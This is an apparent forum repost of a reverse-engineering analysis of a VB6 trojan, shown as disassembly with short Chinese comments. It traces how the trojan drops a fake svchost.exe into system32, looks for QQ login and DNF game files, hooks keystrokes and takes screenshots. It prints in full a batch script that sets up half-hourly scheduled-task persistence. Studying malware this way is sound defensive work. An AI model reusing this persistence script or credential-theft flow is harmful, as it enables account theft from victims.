此為本人學習、無聊研究用,為了要備份文章,所以才發在這裡。
作者: 中國大陸-当红小生- 7339EDA9 . 50 push eax ; /pVersionInformation
- 7339EDAA . 33FF xor edi,edi ; |
- 7339EDAC . C785 54FFFFFF>mov dword ptr ss:[ebp-AC],94 ; |
- 7339EDB6 . FF15 CC103973 call dword ptr ds:[<&KERNEL32.GetVersion>; \GetVersionExA
- 7339EDBC . 33C0 xor eax,eax
- ......
- 7339EE1F . 8D85 68FFFFFF lea eax,dword ptr ss:[ebp-98]
- 7339EE25 . 68 589F3A73 push msvbvm60.733A9F58 ; Service pack
- 7339EE2A . 50 push eax
- 00406882 FF50 04 call dword ptr ds:[eax+4] ; msvbvm60.Zombie_AddRef
- 00406885 C745 FC 0100000>mov dword ptr ss:[ebp-4],1
- 0040688C C745 FC 0200000>mov dword ptr ss:[ebp-4],2
- 00406893 E8 48960000 call 脱壳后.0040FEE0 ; F7进去是获取目录
- 00406898 C745 FC 0300000>mov dword ptr ss:[ebp-4],3
- 0040689F 6A FF push -1 ; /OnErrEvent = Resume Next
- 004068A1 FF15 78F04100 call dword ptr ds:[<&msvbvm60.__vbaOnErr>; msvbvm60.__vbaOnError
- 004068A7 C745 FC 0400000>mov dword ptr ss:[ebp-4],4
- 004068AE 8B15 48504100 mov edx,dword ptr ds:[415048] ; (UNICODE "C:\WINDOWS\system32")
- 004068B4 52 push edx
- 004068B5 68 88324000 push 脱壳后.00403288 ; \Pusmint
- 004068BA FF15 48F04100 call dword ptr ds:[<&msvbvm60.__vbaStrCa>; msvbvm60.__vbaStrCat
- 004068C0 8BD0 mov edx,eax ; "C:\WINDOWS\system32\Pusmint")
- 004068C2 8D4D DC lea ecx,dword ptr ss:[ebp-24]
- 004068C5 FF15 F4F14100 call dword ptr ds:[<&msvbvm60.__vbaStrMo>; msvbvm60.__vbaStrMove
- 004068CB 50 push eax ; (UNICODE "C:\WINDOWS\system32\Pusmint")
- 004068CC FF15 40F14100 call dword ptr ds:[<&msvbvm60.rtcMakeDir>; F7
- 004068D2 8D4D DC lea ecx,dword ptr ss:[ebp-24] ; 创建目录
- 004068D5 FF15 18F24100 call dword ptr ds:[<&msvbvm60.__vbaFreeS>; msvbvm60.__vbaFreeStr
- 004068DB C745 FC 0500000>mov dword ptr ss:[ebp-4],5
- 004068E2 A1 48504100 mov eax,dword ptr ds:[415048]
- 004068E7 50 push eax
- 004068E8 68 B4324000 push 脱壳后.004032B4 ; \Pusmint\svchost.exe
- 004068ED FF15 48F04100 call dword ptr ds:[<&msvbvm60.__vbaStrCa>; msvbvm60.__vbaStrCat
- 004068F3 8BD0 mov edx,eax
- 004068F5 8D4D DC lea ecx,dword ptr ss:[ebp-24]
- 004068F8 FF15 F4F14100 call dword ptr ds:[<&msvbvm60.__vbaStrMo>; msvbvm60.__vbaStrMove
- 00406B9E FF15 70F14100 call dword ptr ds:[<&msvbvm60.rtcDir>] ; msvbvm60.rtcDir
- 00406BA4 8BD0 mov edx,eax ; (UNICODE "svchost.exe")
- 00406BA6 8D4D E0 lea ecx,dword ptr ss:[ebp-20]
- 00406BA9 FFD7 call edi ; (msvbvm60.__vbaStrMove)
- 00406BAB 50 push eax
- 00406BAC 68 3C334000 push 脱壳后.0040333C
- 00406BB1 FF15 BCF04100 call dword ptr ds:[<&msvbvm60.__vbaStr>; msvbvm60.__vbaStrCmp
- 00406BB7 8BF0 mov esi,eax
- 00406BB9 8D4D E0 lea ecx,dword ptr ss:[ebp-20]
- 00406BBC F7DE neg esi
- 00406BBE 1BF6 sbb esi,esi
- 00406BC0 46 inc esi
- 00406BC1 F7DE neg esi
- 00406BC3 FF15 18F24100 call dword ptr ds:[<&msvbvm60.__vbaFre>; msvbvm60.__vbaFreeStr
- 733BD096 . 51 push ecx ; /pLocalFileTime
- 733BD097 . 50 push eax ; |pFileTime
- 733BD098 . FF15 F0103973 call dword ptr ds:[<&KERNEL32.FileTime>; \FileTimeToLocalFileTime
- 733BD09E . 85C0 test eax,eax
- 733BD0A0 . 0F84 09B10100 je msvbvm60.733D81AF
- 733BD0A6 . 8D5424 08 lea edx,dword ptr ss:[esp+8]
- 733BD0AA . 8D4424 00 lea eax,dword ptr ss:[esp]
- 733BD0AE . 52 push edx ; /pSystemTime
- 733BD0AF . 50 push eax ; |pFileTime
- 733BD0B0 . FF15 F4103973 call dword ptr ds:[<&KERNEL32.FileTime>; \FileTimeToSystemTime
- 0041005C 8B35 A0F14100 mov esi,dword ptr ds:[<&msvbvm60.__vba>; msvbvm60.__vbaStrCopy
- 00410062 33FF xor edi,edi
- 00410064 8D4D D4 lea ecx,dword ptr ss:[ebp-2C]
- 00410067 897D EC mov dword ptr ss:[ebp-14],edi
- 0041006A 897D DC mov dword ptr ss:[ebp-24],edi
- 0041006D 897D D8 mov dword ptr ss:[ebp-28],edi
- 00410070 897D D4 mov dword ptr ss:[ebp-2C],edi
- 00410073 FFD6 call esi ; <&msvbvm60.__vbaStrCopy>
- 00410075 8B55 10 mov edx,dword ptr ss:[ebp+10]
- 00410078 8D4D EC lea ecx,dword ptr ss:[ebp-14]
- 0041007B FFD6 call esi ; (msvbvm60.__vbaStrCopy)
- 0041007D 8B45 D4 mov eax,dword ptr ss:[ebp-2C] ; "C:\Documents and Settings\Administrator\")
- 00410080 8B35 7CF14100 mov esi,dword ptr ds:[<&msvbvm60.__vba>; msvbvm60.__vbaFileOpen
- 00410086 50 push eax
- 00410087 6A 01 push 1
- 00410089 6A FF push -1
- 0041008B 68 20010000 push 120
- 00410090 FFD6 call esi ; <&msvbvm60.__vbaFileOpen>
- 00410092 57 push edi
- 00410093 6A 01 push 1
- 00410095 FF15 88F14100 call dword ptr ds:[<&msvbvm60.rtcFileL>; msvbvm60.rtcFileLength
- 0041009B 8B3D F8F04100 mov edi,dword ptr ds:[<&msvbvm60.__vba>; msvbvm60.__vbaRedim
- 004100A1 50 push eax
- 004100A2 6A 01 push 1
- 004100A4 8D4D D8 lea ecx,dword ptr ss:[ebp-28]
- 004100A7 6A 11 push 11
- 004100A9 51 push ecx
- 004100AA 6A 01 push 1
- 004100AC 68 80000000 push 80
- 004100B1 FFD7 call edi ; (msvbvm60.__vbaRedim)
- 004100B3 83C4 1C add esp,1C
- 004100B6 8D55 D8 lea edx,dword ptr ss:[ebp-28]
- 004100B9 6A 01 push 1
- 004100BB 52 push edx
- 004100BC 68 244A4000 push 脱壳后.00404A24
- 004100C1 FF15 50F14100 call dword ptr ds:[<&msvbvm60.__vbaGet>; msvbvm60.__vbaGetOwner3
- 004100C7 8B1D A4F04100 mov ebx,dword ptr ds:[<&msvbvm60.__vba>; msvbvm60.__vbaFileClose
- 004100CD 6A 01 push 1
- 004100CF FFD3 call ebx ; <&msvbvm60.__vbaFileClose>
- 004100D1 8B45 EC mov eax,dword ptr ss:[ebp-14]
- 004100D4 50 push eax
- 004100D5 6A 02 push 2
- 004100D7 6A FF push -1
- 004100D9 6A 20 push 20 ; 看函数名就知道有动作了。。。
- 004100DB FFD6 call esi ; (msvbvm60.__vbaFileOpen)
- 00407281 C745 FC 0900000>mov dword ptr ss:[ebp-4],9
- 00407288 6A FF push -1
- 0040728A FF15 78F04100 call dword ptr ds:[<&msvbvm60.__>; msvbvm60.__vbaOnError
- 00407290 C745 FC 0A00000>mov dword ptr ss:[ebp-4],0A
- 00407297 8B0D 48504100 mov ecx,dword ptr ds:[415048]
- 0040729D 51 push ecx
- 0040729E 68 F8364000 push 脱壳后.004036F8 ; \Pusmint\SystemDir.bat 东西还真不少
- 004072A3 FF15 48F04100 call dword ptr ds:[<&msvbvm60.__>; msvbvm60.__vbaStrCat
- 004072A9 8BD0 mov edx,eax
- 004072AB 8D4D C0 lea ecx,dword ptr ss:[ebp-40]
- 004072AE FF15 F4F14100 call dword ptr ds:[<&msvbvm60.__>; msvbvm60.__vbaStrMove
- 004072B4 50 push eax
- 004072B5 6A 01 push 1
- 004072B7 6A FF push -1
- 004072B9 6A 02 push 2
- 004072BB FF15 7CF14100 call dword ptr ds:[<&msvbvm60.__>; msvbvm60.__vbaFileOpen
- 004072C1 8D4D C0 lea ecx,dword ptr ss:[ebp-40]
- 004072C4 FF15 18F24100 call dword ptr ds:[<&msvbvm60.__>; msvbvm60.__vbaFreeStr
- {
- sc config Schedule start= AUTO
- net start schedule
- AT 0:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
- AT 1:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
- AT 2:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
- AT 3:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
- AT 4:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
- AT 5:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
- AT 6:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
- AT 7:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
- AT 8:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
- AT 9:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
- AT 10:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
- AT 11:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
- AT 12:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
- AT 13:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
- AT 14:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
- AT 15:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
- AT 16:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
- AT 17:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
- AT 18:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
- AT 19:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
- AT 20:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
- AT 21:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
- AT 22:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
- AT 23:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
- AT 0:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
- AT 1:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
- AT 2:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
- AT 3:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
- AT 4:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
- AT 5:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
- AT 6:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
- AT 7:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
- AT 8:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
- AT 9:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
- AT 10:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
- AT 11:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
- AT 12:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
- AT 13:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
- AT 14:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
- AT 15:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
- AT 16:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
- AT 17:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
- AT 18:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
- AT 19:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
- AT 20:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
- AT 21:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
- AT 22:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
- AT 23:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
- }
複製代碼 我是分隔線
- 00402F43 00 db 00
- 00402F44 $ A1 FC564100 mov eax,dword ptr ds:[4156FC]
- 00402F49 . 0BC0 or eax,eax
- 00402F4B . 74 02 je short svchost.00402F4F
- 00402F4D . FFE0 jmp eax
- 00402F4F > 68 2C2F4000 push svchost.00402F2C ; FindWindowA
- 00402F54 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctionC>
- 00402F59 . FFD0 call eax
- 00402F5B . FFE0 jmp eax ; user32.FindWindowA
- 00402F5D 00 db 00
- 00402F5E 00 db 00
- 00403034 [ DISCUZ_CODE_4 ]nbsp; A1 20574100 mov eax,dword ptr ds:[415720]
- 00403039 . 0BC0 or eax,eax
- 0040303B . 74 02 je short svchost.0040303F
- 0040303D . FFE0 jmp eax
- 0040303F > 68 1C304000 push svchost.0040301C ; user32
- 00403044 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctionCall>
- 00403049 . FFD0 call eax
- 0040304B . FFE0 jmp eax ; SendMessageA
- 0040307C [ DISCUZ_CODE_4 ]nbsp; A1 2C574100 mov eax,dword ptr ds:[41572C]
- 00403081 . 0BC0 or eax,eax
- 00403083 . 74 02 je short svchost.00403087
- 00403085 . FFE0 jmp eax
- 00403087 > 68 64304000 push svchost.00403064 ;
- 0040308C . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctionCall>
- 00403091 . FFD0 call eax
- 00403093 . FFE0 jmp eax ; RtlMoveMemory
- 00403114 [ DISCUZ_CODE_4 ]nbsp; A1 44574100 mov eax,dword ptr ds:[415744]
- 00403119 . 0BC0 or eax,eax
- 0040311B . 74 02 je short svchost.0040311F
- 0040311D . FFE0 jmp eax
- 0040311F > 68 FC304000 push svchost.004030FC ;
- 00403124 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctionC>
- 00403129 . FFD0 call eax
- 0040312B . FFE0 jmp eax ; GetForegroundWindow
- 0040315C [ DISCUZ_CODE_4 ]nbsp; A1 50574100 mov eax,dword ptr ds:[415750]
- 00403161 . 0BC0 or eax,eax
- 00403163 . 74 02 je short svchost.00403167
- 00403165 . FFE0 jmp eax
- 00403167 > 68 44314000 push svchost.00403144 ; user32
- 0040316C . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctionC>
- 00403171 . FFD0 call eax
- 00403173 . FFE0 jmp eax ; GetWindowTextA
- 0040501F > \68 FC4F4000 push svchost.00404FFC ; GetClassNameA
- 00405024 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctionCall>
- 00405029 . FFD0 call eax
- 0040502B . FFE0 jmp eax ; GetClassNameA
- 0040349C $ A1 A4574100 mov eax,dword ptr ds:[4157A4]
- 004034A1 . 0BC0 or eax,eax
- 004034A3 . 74 02 je short svchost.004034A7
- 004034A5 . FFE0 jmp eax
- 004034A7 > 68 84344000 push svchost.00403484 ; RegisterWindowMessageA
- 004034AC . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctionC>
- 004034B1 . FFD0 call eax
- 004034B3 . FFE0 jmp eax
- 0040344C $ A1 98574100 mov eax,dword ptr ds:[415798]
- 00403451 . 0BC0 or eax,eax
- 00403453 . 74 02 je short svchost.00403457
- 00403455 . FFE0 jmp eax
- 00403457 > 68 34344000 push svchost.00403434 ; RegisterShellHookWindow
- 0040345C . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunction>
- 00403461 . FFD0 call eax
- 00403463 . FFE0 jmp eax
- 00403543 > \68 20354000 push svchost.00403520 ; SetWindowLongA
- 00403548 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctio>
- 0040354D . FFD0 call eax
- 0040354F .- FFE0 jmp eax ; user32.SetWindowLongA
- 00402EA4 $ A1 F0564100 mov eax,dword ptr ds:[4156F0]
- 00402EA9 . 0BC0 or eax,eax
- 00402EAB . 74 02 je short svchost.00402EAF
- 00402EAD . FFE0 jmp eax
- 00402EAF > 68 8C2E4000 push svchost.00402E8C ; GetWindowThreadProcessId
- 00402EB4 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctio>
- 00402EB9 . FFD0 call eax
- 00402EBB .- FFE0 jmp eax ; user32.GetWindowThreadProcessId
- 00411639 . 6A 03 push 3 ; /varType = Long
- 0041163B . 8D45 C8 lea eax,dword ptr ss:[ebp-38] ; |
- 0041163E . 33FF xor edi,edi ; |
- 00411640 . 68 005B4000 push svchost.00405B00 ; |ArraySturctdes = svchost.00405B00
- 00411645 . 50 push eax ; |ArrayVar
- 00411646 . 897D E0 mov dword ptr ss:[ebp-20],edi ; |
- 00411649 . 897D BC mov dword ptr ss:[ebp-44],edi ; |
- 0041164C . 897D B8 mov dword ptr ss:[ebp-48],edi ; |
- 0041164F . 897D A8 mov dword ptr ss:[ebp-58],edi ; |
- 00411652 . 897D A4 mov dword ptr ss:[ebp-5C],edi ; |
- 00411655 . FF15 CCF04100 call dword ptr ds:[<&msvbvm60.__v>; \__vbaAryConstruct2
- 0041165B . 8B4D 08 mov ecx,dword ptr ss:[ebp+8]
- 0041165E . 51 push ecx
- 0041165F . 57 push edi
- 00411660 . 68 10040000 push 410
- 00411665 . E8 361BFFFF call svchost.004031A0 ; 打开进程
- {
- 004031A0 $ A1 5C574100 mov eax,dword ptr ds:[41575C]
- 004031A5 . 0BC0 or eax,eax
- 004031A7 . 74 02 je short svchost.004031AB
- 004031A9 . FFE0 jmp eax
- 004031AB > 68 88314000 push svchost.00403188 ; OpenProcess
- 004031B0 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctio>
- 004031B5 . FFD0 call eax
- 004031B7 .- FFE0 jmp eax ; kernel32.OpenProcess
- }
- 0041166A . 8B35 50F04100 mov esi,dword ptr ds:[<&msvbvm60.>; msvbvm60.__vbaSetSystemError
- 00411670 . 8945 A4 mov dword ptr ss:[ebp-5C],eax
- 00411673 . FFD6 call esi ; <&msvbvm60.__vbaSetSystemError>
- 004116A8 . FF15 A8F04100 call dword ptr ds:[<&msvbvm60.rtc>; msvbvm60.rtcSpaceVar
- 004116AE . 8D45 A8 lea eax,dword ptr ss:[ebp-58]
- 004116B1 . 50 push eax
- 004116B2 . FF15 18F04100 call dword ptr ds:[<&msvbvm60.__v>; msvbvm60.__vbaStrVarMove
- 004116B8 . 8BD0 mov edx,eax
- 004116BA . 8D4D BC lea ecx,dword ptr ss:[ebp-44]
- 004116BD . FF15 F4F14100 call dword ptr ds:[<&msvbvm60.__v>; msvbvm60.__vbaStrMove
- 004116C3 . 8D4D A8 lea ecx,dword ptr ss:[ebp-58]
- 004116C6 . FF15 10F04100 call dword ptr ds:[<&msvbvm60.__v>; msvbvm60.__vbaFreeVar
- 004116CC . 8B4D BC mov ecx,dword ptr ss:[ebp-44]
- 004116CF . 68 F4010000 push 1F4
- 004116D4 . 8D55 B8 lea edx,dword ptr ss:[ebp-48]
- 004116D7 . 51 push ecx
- 004116D8 . 52 push edx
- 004116D9 . FF15 D8F14100 call dword ptr ds:[<&msvbvm60.__v>; msvbvm60.__vbaStrToAnsi
- 00404B28 $ A1 F8574100 mov eax,dword ptr ds:[4157F8]
- 00404B2D . 0BC0 or eax,eax
- 00404B2F . 74 02 je short svchost.00404B33
- 00404B31 . FFE0 jmp eax
- 00404B7F > \68 5C4B4000 push svchost.00404B5C ; EnumProcessModules
- 00404B84 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctionCall>
- 00404B89 . FFD0 call eax
- 00404B8B . FFE0 jmp eax ; EnumProcessModules
- 004116F9 . FF15 20F14100 call dword ptr ds:[<&msvbvm60.__v>; msvbvm60.__vbaStrToUnicode
- 004116FF . 8D4D B8 lea ecx,dword ptr ss:[ebp-48]
- 00411702 . FF15 18F24100 call dword ptr ds:[<&msvbvm60.__v>; msvbvm60.__vbaFreeStr
- 00411708 . 8B55 BC mov edx,dword ptr ss:[ebp-44]
- 0041170B . 8D4D E0 lea ecx,dword ptr ss:[ebp-20]
- 0041170E . FF15 A0F14100 call dword ptr ds:[<&msvbvm60.__v>; msvbvm60.__vbaStrCopy
- 00403230 $ A1 74574100 mov eax,dword ptr ds:[415774]
- 00403235 . 0BC0 or eax,eax
- 00403237 . 74 02 je short svchost.0040323B
- 00403239 . FFE0 jmp eax
- 0040323B > 68 18324000 push svchost.00403218 ; CloseHandle
- 00403240 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunction>
- 00403245 . FFD0 call eax
- 00403247 . FFE0 jmp eax
- 0040C2BC . FF15 B8F04100 call dword ptr ds:[<&msvbvm60.rt>; msvbvm60.rtcUpperCaseVar
- 0040C2C2 . 6A 00 push 0
- 0040C2C4 . 6A FF push -1
- 0040C2C6 . 6A 01 push 1
- 0040C2C8 . 68 BC4B4000 push svchost.00404BBC ; UserSetting.ini
- 0040C2CD . 68 A04B4000 push svchost.00404BA0 ; QQLOGIN.EXE
- 0040C2D2 . 8D45 B8 lea eax,dword ptr ss:[ebp-48]
- 0040C2D5 . 50 push eax ; /String8
- 0040C2D6 . 8D4D D0 lea ecx,dword ptr ss:[ebp-30] ; |
- 0040C2D9 . 51 push ecx ; |ARG2 = 0012FB48
- 0040C2DA . FF15 54F14100 call dword ptr ds:[<&msvbvm60.__>; \__vbaStrVarVal
- 0040C322 . FF15 B8F04100 call dword ptr ds:[<&msvbvm60.rt>; msvbvm60.rtcUpperCaseVar
- 0040C328 . 6A 00 push 0
- 0040C32A . 6A FF push -1
- 0040C32C . 6A 01 push 1
- 0040C32E . 68 E04B4000 push svchost.00404BE0 ; config\Info.ini
- 0040C333 . 68 A04B4000 push svchost.00404BA0 ; QQLOGIN.EXE
- 0040C338 . 8D55 B8 lea edx,dword ptr ss:[ebp-48]
- 0040C33B . 52 push edx ; /String8
- 0040C33C . 8D45 D0 lea eax,dword ptr ss:[ebp-30] ; |
- 0040C33F . 50 push eax ; |ARG2
- 0040C340 . FF15 54F14100 call dword ptr ds:[<&msvbvm60.__>; \__vbaStrVarVal
- 0040C673 . BA 044C4000 mov edx,svchost.00404C04 ; dnf.exe
- 0040C678 . 8D4D CC lea ecx,dword ptr ss:[ebp-34]
- 0040C67B . FF15 A0F14100 call dword ptr ds:[<&msvbvm60.__vbaStrCo>; msvbvm60.__vbaStrCopy
- 0040C681 . 8D55 CC lea edx,dword ptr ss:[ebp-34]
- 00404C6F > \68 4C4C4000 push svchost.00404C4C ; CreateToolhelp32Snapshot
- 00404C74 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctionCal>
- 00404C79 . FFD0 call eax
- 00404C7B .- FFE0 jmp eax ; kernel32.CreateToolhelp32Snapshot
- 00404CD3 > \68 B04C4000 push svchost.00404CB0 ; Process32First
- 00404CD8 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctionC>
- 00404CDD . FFD0 call eax
- 00404CDF . FFE0 jmp eax ; Process32First
- 00404D1B > \68 F84C4000 push svchost.00404CF8 ; Process32Next
- 00404D20 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctionC>
- 00404D25 . FFD0 call eax
- 00404D27 .- FFE0 jmp eax ; kernel32.Process32Next
- 0040C685 . E8 064C0000 call svchost.00411290 ; 创建快照
- 0040C68A . 8945 D8 mov dword ptr ss:[ebp-28],eax
- 0040C68D . 8D4D CC lea ecx,dword ptr ss:[ebp-34]
- 0040C690 . FF15 18F24100 call dword ptr ds:[<&msvbvm60.__vba>; msvbvm60.__vbaFreeStr
- 0040C696 . C745 FC 03000>mov dword ptr ss:[ebp-4],3
- 0040C69D . 837D D8 00 cmp dword ptr ss:[ebp-28],0
- 0040C6A1 . 0F84 62240000 je svchost.0040EB09 这个是判断是否有DNF.exe
- 0040C6A7 . C745 FC 04000>mov dword ptr ss:[ebp-4],4
- 004034FB > \68 D8344000 push svchost.004034D8 ; DeregisterShellHookWindow
- 00403500 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctionC>
- 00403505 . FFD0 call eax
- 00403507 . FFE0 jmp eax
- 733A03F6 BB B8A63A73 mov ebx,msvbvm60.733AA6B8 ; ThunderRT6Main
- 733A03FB 50 push eax
- 733A03FC 53 push ebx
- 733A03FD FF35 D0064A73 push dword ptr ds:[734A06D0] ; msvbvm60.73390000
- 733A0403 FF15 F8123973 call dword ptr ds:[<&USER32.GetClassI>; user32.GetClassInfoExA
- 733A0409 33F6 xor esi,esi
- 733A040B 85C0 test eax,eax
- 733A040D 75 71 jnz short msvbvm60.733A0480
- 733A040F 6A 0C push 0C
- 733A0411 8D7D CC lea edi,dword ptr ss:[ebp-34]
- 733A0414 59 pop ecx
- 733A0415 6A 01 push 1
- 733A0417 FF35 D4064A73 push dword ptr ds:[734A06D4] ; svchost.00400000
- 733A130E . BF 10A93A73 mov edi,msvbvm60.733AA910 ; ASCII "VBMsoStdCompMgr"
- 733A1313 . 68 55133A73 push msvbvm60.733A1355
- 733A1318 . 57 push edi
- 733A1319 . E8 7DDEFFFF call msvbvm60.7339F19B
- 004035D0 [ DISCUZ_CODE_4 ]nbsp; A1 D4574100 mov eax,dword ptr ds:[4157D4]
- 004035D5 . 0BC0 or eax,eax
- 004035D7 . 74 02 je short svchost.004035DB
- 004035D9 . FFE0 jmp eax
- 004035DB > 68 B8354000 push svchost.004035B8 ; user32
- 004035E0 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctionCall>
- 004035E5 . FFD0 call eax
- 004035E7 . FFE0 jmp eax ; GetWindowTextLengthW
- 0040364D . 0BC0 or eax,eax
- 0040364F . 74 02 je short svchost.00403653
- 00403651 . FFE0 jmp eax
- 00403653 > 68 30364000 push svchost.00403630 ; user32
- 00403658 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctionCall>
- 0040365D . FFD0 call eax
- 0040365F . FFE0 jmp eax ; GetKeyState
- 00403690 [ DISCUZ_CODE_4 ]nbsp; A1 EC574100 mov eax,dword ptr ds:[4157EC]
- 00403695 . 0BC0 or eax,eax
- 00403697 . 74 02 je short svchost.0040369B
- 00403699 . FFE0 jmp eax
- 0040369B > 68 78364000 push svchost.00403678 ; user32
- 004036A0 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctionCall>
- 004036A5 . FFD0 call eax
- 004036A7 . FFE0 jmp eax ; MapVirtualKeyA
- 7340CEF2 |. 56 push esi ; /lParam
- 7340CEF3 |. FF75 0C push [arg.2] ; |wParam
- 7340CEF6 |. FF75 08 push [arg.1] ; |HookCode
- 7340CEF9 |. FFB0 6C020000 push dword ptr ds:[eax+26C] ; |hHook
- 7340CEFF |. FF15 C8143973 call dword ptr ds:[<&USER32.CallNex>; \CallNextHookEx
- 004033B0 [ DISCUZ_CODE_4 ]nbsp; A1 80574100 mov eax,dword ptr ds:[415780]
- 004033B5 . 0BC0 or eax,eax
- 004033B7 . 74 02 je short svchost.004033BB
- 004033B9 . FFE0 jmp eax
- 004033BB > 68 98334000 push svchost.00403398 ; user32
- 004033C0 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctionCall>
- 004033C5 . FFD0 call eax
- 004033C7 . FFE0 jmp eax ; GetDC
- 733A1BAF . 57 push edi ; /hDC => NULL
- 733A1BB0 . FF15 D0163973 call dword ptr ds:[<&GDI32.CreateCompati>; \CreateCompatibleDC
- 733A1BB6 . 3BC7 cmp eax,edi
- 733A1BB8 . 8986 640E0000 mov dword ptr ds:[esi+E64],eax
- 733A1BBE . 0F84 6F590200 je msvbvm60.733C7533
- 733A1BC4 . 6A 07 push 7 ; /ObjectType = OBJ_BITMAP
- 733A1BC6 . 50 push eax ; |hDC
- 733A1BC7 . FF15 50173973 call dword ptr ds:[<&GDI32.GetCurrentObj>; \GetCurrentObject
- 004059AB > \68 88594000 push svchost.00405988 ; GDIPlus
- 004059B0 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctionCall>
- 004059B5 . FFD0 call eax
- 004059B7 . FFE0 jmp eax ; GdipSaveImageToFile
- 0040D51A . 68 704E4000 push svchost.00404E70 ; /\Pusmint\jietu.jpg
- 0040D51F . FF15 48F04100 call dword ptr ds:[<&msvbvm60.__vbaStrCa>; \__vbaStrCat
